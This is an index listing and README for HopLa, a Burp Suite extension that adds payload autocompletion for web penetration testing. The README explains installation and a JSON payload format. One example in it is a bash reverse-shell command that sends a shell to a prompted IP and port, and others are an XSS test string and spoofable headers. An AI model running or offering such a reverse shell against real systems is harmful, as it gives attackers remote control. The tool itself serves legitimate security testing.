Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/synacktiv/HopLa
HopLa Burp Suite Extender plugin - Adds autocompletion support and useful payloads in Burp Suite
https://github.com/synacktiv/HopLa
burp burp-extensions burp-plugin burp-suite burp-ui
Last synced: 24 days ago
JSON representation
HopLa Burp Suite Extender plugin - Adds autocompletion support and useful payloads in Burp Suite
- Host: GitHub
- URL: https://github.com/synacktiv/HopLa
- Owner: synacktiv
- License: bsd-3-clause
- Created: 2021-05-06T11:01:23.000Z (over 3 years ago)
- Default Branch: main
- Last Pushed: 2021-05-12T16:24:50.000Z (over 3 years ago)
- Last Synced: 2024-08-04T00:06:23.348Z (4 months ago)
- Topics: burp, burp-extensions, burp-plugin, burp-suite, burp-ui
- Language: Java
- Homepage:
- Size: 272 KB
- Stars: 614
- Watchers: 13
- Forks: 71
- Open Issues: 4
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
- awesome-burp-extensions - HopLa - This extension adds autocompletion support and useful payloads in Burp Suite to make your intrusion easier. (Payload Generators and Fuzzers / SSRF)
- awesome-hacking-lists - synacktiv/HopLa - HopLa Burp Suite Extender plugin - Adds autocompletion support and useful payloads in Burp Suite (Java)
README
# HopLa
💥 All the power of PayloadsAllTheThings, without the overhead.
This extension adds autocompletion support and useful payloads in Burp Suite to make your intrusion easier.
Feel free to improve with your payloads ! ❤️
Developed by Alexis Danizan [](https://twitter.com/alexisdanizan/)
Released as open source by [Synacktiv 🥷](https://www.synacktiv.com/)
## Getting started
### Installation
* Download the jar file from the release directory
* Add it to Burp Suite using the Extender tab
### Build
Execute `gradle build` and you'll have the plugin ready in `releases/HopLa.jar`.
## Usage
By default HopLa is shipped with default payloads. You can add yours by loading a custom JSON file in the the menu.
At the first usage HopLa creates a JSON file containing all the payloads in the jar file directory.
Press `Ctrl+Q` to display the payload library menu.
You can disable the global autocompletion in the top menu.
For i3, add the following line to `$HOME/.config/i3/config` for floating frame:
```
for_window [class=".*burp-StartBurp.*" title="^ $"] floating enable
```
### How to add payloads
The JSON payloads file follow the structure:
```json
{
"categories": [
{
"name": "XSS",
"values": [
{
"name": "Simple",
"value": "alert(1)"
},
{
"name": "Multiline",
"value": "AAAA\nBBBB"
},
{
"name" : "Nested XSS menu",
"values": [
{
"name": "Simple 2",
"value": "alert(1)"
}
]
}
]
}
],
"keywords": [
{
"name": "Headers",
"values": [
"X-Forwarded-For",
"X-Originally-Forwarded-For",
"X-Originating-Ip",
"X-Originating-IP"
]
}
]
}
```
There is no nesting limit.
You can automatically add a prompt dialog:
```json
{
"name": "Bash UDP",
"value": "sh -i >& /dev/udp/§IP§/§PORT§ 0>&1",
"prompt": ["IP","PORT"]
},
```
To add only keywords that do not appear in the menu, you can add them in the keywords category:
```json
{
"keywords": [
{
"name": "Headers",
"values": [
"X-Forwarded-For",
"X-Originally-Forwarded-For",
"X-Originating-Ip",
"X-Originating-IP"
]
}
]
}
```
## Roadmap
* Support custom key binding for payload menu
## Thanks To
* https://github.com/Static-Flow/BurpSuiteAutoCompletion
* https://github.com/d3vilbug/HackBar
* https://github.com/swisskyrepo/PayloadsAllTheThings
Thanks a lot for your awesome work !
## License
Released under BSD 3-Clause License see LICENSE for more information
Please feel free to report bugs, suggest features, or send pull requests.